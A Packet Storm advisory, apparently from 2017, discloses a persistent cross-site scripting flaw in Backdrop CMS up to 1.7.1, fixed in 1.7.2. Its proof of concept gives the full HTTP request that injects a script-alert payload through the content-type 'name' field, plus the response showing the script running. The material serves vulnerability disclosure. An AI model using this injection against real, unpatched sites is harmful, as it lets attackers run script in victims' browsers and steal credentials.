Backdrop CMS 1.7.1 Cross Site Scripting

2017-08-23T00:00:00
ID PACKETSTORM:143889
Type packetstorm
Reporter Manuel Garcia Cardenas
Modified 2017-08-23T00:00:00

Description

                                        
                                            `=============================================  
MGC ALERT 2017-005  
- Original release date: July 11, 2017  
- Last revised: August 18, 2017  
- Discovered by: Manuel Garcia Cardenas  
- Severity: 4,8/10 (CVSS Base Score)  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Backdrop CMS <= 1.7.1 - Persistent Cross-Site Scripting  
  
II. BACKGROUND  
-------------------------  
Backdrop CMS is a simple, lightweight, and easy to use Content Management  
System used to build attractive, professional websites.  
  
III. DESCRIPTION  
-------------------------  
Has been detected a Persistent XSS vulnerability in Backdrop CMS, that  
allows the execution of arbitrary HTML/script code to be executed in the  
context of the victim user's browser.  
  
IV. PROOF OF CONCEPT  
-------------------------  
Go to: Structure -> Content types -> Add content type  
  
And post:  
  
POST /backdrop/admin/structure/types/add HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101  
Firefox/54.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 605  
Referer: http://127.0.0.1/backdrop/admin/structure/types/add  
Cookie: Backdrop.tableDrag.showWeight=0;  
PHPSESSID=libl3ge64tv5vajangccjhifu2; phpwcmsBELang=en;  
phpwcmsBEItemsPerPage=50; _ctr=MTI3XzBfMF8xLlpa;  
nv4_cltz=120.60.120%257C%252F%257C;  
nv4_cltn=RXVyb3BlL0Ftc3RlcmRhbS43MjAwLjE%3D;  
nv4c_x4OOk_ctr=MTI3XzBfMF8xLlpa; nv4c_x4OOk_cltz=120.60.120%257C%252F%257C;  
gnew_date_format=D%2C+M+jS+Y%2C+g%3Ai+a; gnew_date_offset=0;  
gnew_language=english; gnew_template=clean;  
SESSaca5a63f4c2fc739381fab7741d68783=X4OPoKhvYQz8Q8QwCrVpgq3JuG4fQ84n1XpQQH0SCjo  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
name=test%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&type=test_script_alert&description=&title_label=Demo&help=&status_default=1&sticky_enabled=1&promote_enabled=1&path_pattern=%5Bnode%3Acontent-type%5D%2F%5Bnode%3Atitle%5D&revision_enabled=1&node_submitted=1&node_user_picture=1&comment_default=2&comment_per_page=50&comment_mode=1&comment_user_picture=1&comment_form_location=1&comment_preview=1&additional_settings__active_tab=&form_build_id=form-biLaugWmv7Z4fGmSK73PYxQZo7hgIwxL2gRwijtrBFA&form_token=j4801oRGZnTQshQQdJ1IKF7-doK6IhB51F1d4nIPwY4&form_id=node_type_form&op=Save+and+add+fields  
  
The variable "name" it is not sanitized, later, if you go to the content  
type created and click in "Manage Displays"  
  
GET /backdrop/admin/structure/types/manage/test-script-alert/display  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101  
Firefox/54.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
  
The XSS is executed, in the response you can view:  
  
Manage display</a></li></ul></div></div></td> </tr><tr class="header  
even"><td>Customized for test"><script>alert(/XSS/)</script></td><td  
class="priority-low"></td><td></td> </tr>  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted user's  
browser, this can leverage to steal sensitive information as user  
credentials, personal data, etc.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Backdrop CMS <= 1.7.1  
  
VII. SOLUTION  
-------------------------  
Install the last release:  
https://github.com/backdrop/backdrop/releases/tag/1.7.2  
  
VIII. REFERENCES  
-------------------------  
https://backdropcms.org/security/backdrop-sa-core-2017-009  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
July 11, 2017 1: Initial release  
August 18, 2017 2: Last revision  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
July 11, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas  
July 11, 2017 2: Send to vendor  
August 17, 2017 3: Vendo fix in 1.7.2 version  
August 18, 2017 4: Sent to lists  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is" with no  
warranties or guarantees of fitness of use or otherwise.  
  
XIII. ABOUT  
-------------------------  
Manuel Garcia Cardenas  
Pentester  
  
  
`